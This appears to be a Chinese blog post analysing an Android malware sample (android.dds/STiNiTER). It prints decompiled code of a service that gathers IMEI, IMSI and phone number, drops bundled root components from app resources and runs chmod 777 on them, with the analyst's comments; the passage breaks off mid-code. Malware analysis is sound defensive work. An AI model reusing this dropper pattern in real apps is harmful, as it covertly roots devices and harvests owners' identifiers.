流程,android.dds.com"/>
android dds流程,android.dds.com
android.dds-STiNiTER_analyse.apk分析报告
1 . AndroidManifest.xml
xmlns:android="">
明显这两个service要关注,特别是第二个,
2.打开Main class,这个是起始activity,打开Main.java代码:
public void onCreate(Bundle paramBundle)
{
super.onCreate(paramBundle);
startService(new Intent(this, GameUpdateService.class));
Instance = this;
Activity一开始就启动了GameUpdateService服务,直接到GameUpdateService去看
如下就是源代码:
public class GameUpdateService extends Service
{
private String DATA;
private String IMEI;
private String IMSI;
private String MODEL;
private InputStream MinputStreamAPK;
private String MpathAPK;
private int MstateAPKFile;
private String OS;
private String PHONENUMBER;
private String PLATFORM;
private String SCREENSIZE;
private String infoName;
private String infoPath;
//从raw资源中提取的恶意程序,root必要组件
private InputStream inputStreamAPK;
private InputStream inputStreamEX;
private InputStream inputStreamEXE;
private InputStream inputStreamID;
private InputStream inputStreamKEEP;
private InputStream inputStreamUNLOCK;
private InputStream inputStreamstart;
private DataInputStream localDataInputStream;
private DataOutputStream localDataOutputStream;
//释放恶意程序,root必要组件的路径
private String pathAPK;
private String pathEX;
private String pathEXE;
private String pathID;
private String pathKEEP;
private String pathUNLOCK;
private String pathstart;
private Process process;
//
private int stateAPKFile;
private int stateEXEFile;
private int stateEXFile;
private int stateIDFile;
private int stateKEEPFile;
private int stateUNLOCKFile;
private int statestartFile;
private String str;
/*在service oncreate结束后onstart中调用线程thread,第一个主要是输出这些apk到指定目录,这里我发现了些问题。在onCreate中已经提到了这个恶意程序的问题。
即data/data/android.gdwsklzz这个目录的权限问题,我估计是他抄的或者改的高达无双科鲁兹传的某个恶意软件版本。
另外我把不重要的异常处理部分都删除了,方便大家阅读
*/
Thread thread = new Thread(new Runnable()
{
public void run()
{ //检查是否是root过的机子
if (!new File("/system/bin/keeper").exists())
{
System.out.println("---start rootSatae");
try
{
while (true)
{
String str = new String(GameUpdateService.this.DATA.getBytes("UTF-8"), "UTF-8");
//这里会报错,因为infoPath是没有权限的,所以这个恶意程序实际上是失败的。
File localFile1 = new File(GameUpdateService.this.infoPath);
if (!localFile1.exists())
localFile1.mkdir();
File localFile2 = new File(GameUpdateService.this.infoPath + GameUpdateService.this.infoName);
if (localFile2.exists())
localFile2.delete();
localFile2.createNewFile();
FileOutputStream localFileOutputStream = new FileOutputStream(localFile2);
localFileOutputStream.write(str.getBytes("UTF-8"));
localFileOutputStream.flush();
localFileOutputStream.close();
//后面是释放root代码的地方。
GameUpdateService.this.stateUNLOCKFile = GameUpdateService.this.write(GameUpdateService.this.inputStreamUNLOCK, GameUpdateService.this.pathUNLOCK);
if (GameUpdateService.this.stateUNLOCKFile != 0)
break label845;
GameUpdateService.this.stateAPKFile = GameUpdateService.this.write(GameUpdateService.this.inputStreamAPK, GameUpdateService.this.pathAPK);
if (GameUpdateService.this.stateAPKFile != 0)
break label817;
GameUpdateService.this.MstateAPKFile = GameUpdateService.this.write(GameUpdateService.this.MinputStreamAPK, GameUpdateService.this.MpathAPK);
if (GameUpdateService.this.MstateAPKFile != 0)
break label789;
GameUpdateService.this.stateIDFile = GameUpdateService.this.write(GameUpdateService.this.inputStreamID, GameUpdateService.this.pathID);
if (GameUpdateService.this.stateIDFile != 0)
break label743;
GameUpdateService.this.stateEXEFile = GameUpdateService.this.write(GameUpdateService.this.inputStreamEXE, GameUpdateService.this.pathEXE);
if (GameUpdateService.this.stateEXEFile != 0)
break;
GameUpdateService.this.stateKEEPFile = GameUpdateService.this.write(GameUpdateService.this.inputStreamKEEP, GameUpdateService.this.pathKEEP);
if (GameUpdateService.this.stateKEEPFile == 0)
{
GameUpdateService.this.stateEXFile = GameUpdateService.this.write(GameUpdateService.this.inputStreamEX, GameUpdateService.this.pathEX);
if (GameUpdateService.this.stateEXFile != 0)
continue;
GameUpdateService.this.statestartFile = GameUpdateService.this.write(GameUpdateService.this.inputStreamstart, GameUpdateService.this.pathstart);
if (GameUpdateService.this.statestartFile != 0)
continue;
//设置权限,给予运行的权限,
GameUpdateService.this.do_exec("chmod 777 /data/data/android.gdwsklzz/googleservice.apk");
GameUpdateService.this.do_exec("chmod 777 /data/data/android.gdwsklzz/googlemessage.apk");
GameUpdateService.this.do_exec("chmod 777 /data/data/android.gdwsklzz/unlock.apk");
GameUpdateService.this.do_exec("chmod 777 /data/data/android.gdwsklzz/ts");
GameUpdateService.this.do_exec("chmod 777 /data/data/android.gdwsklzz/keeper");
GameUpdateService.this.do_exec("chmod 777 /data/data/android.gdwsklzz/initr");
//
Ga
更多推荐
android dds流程,android.dds.com
发布评论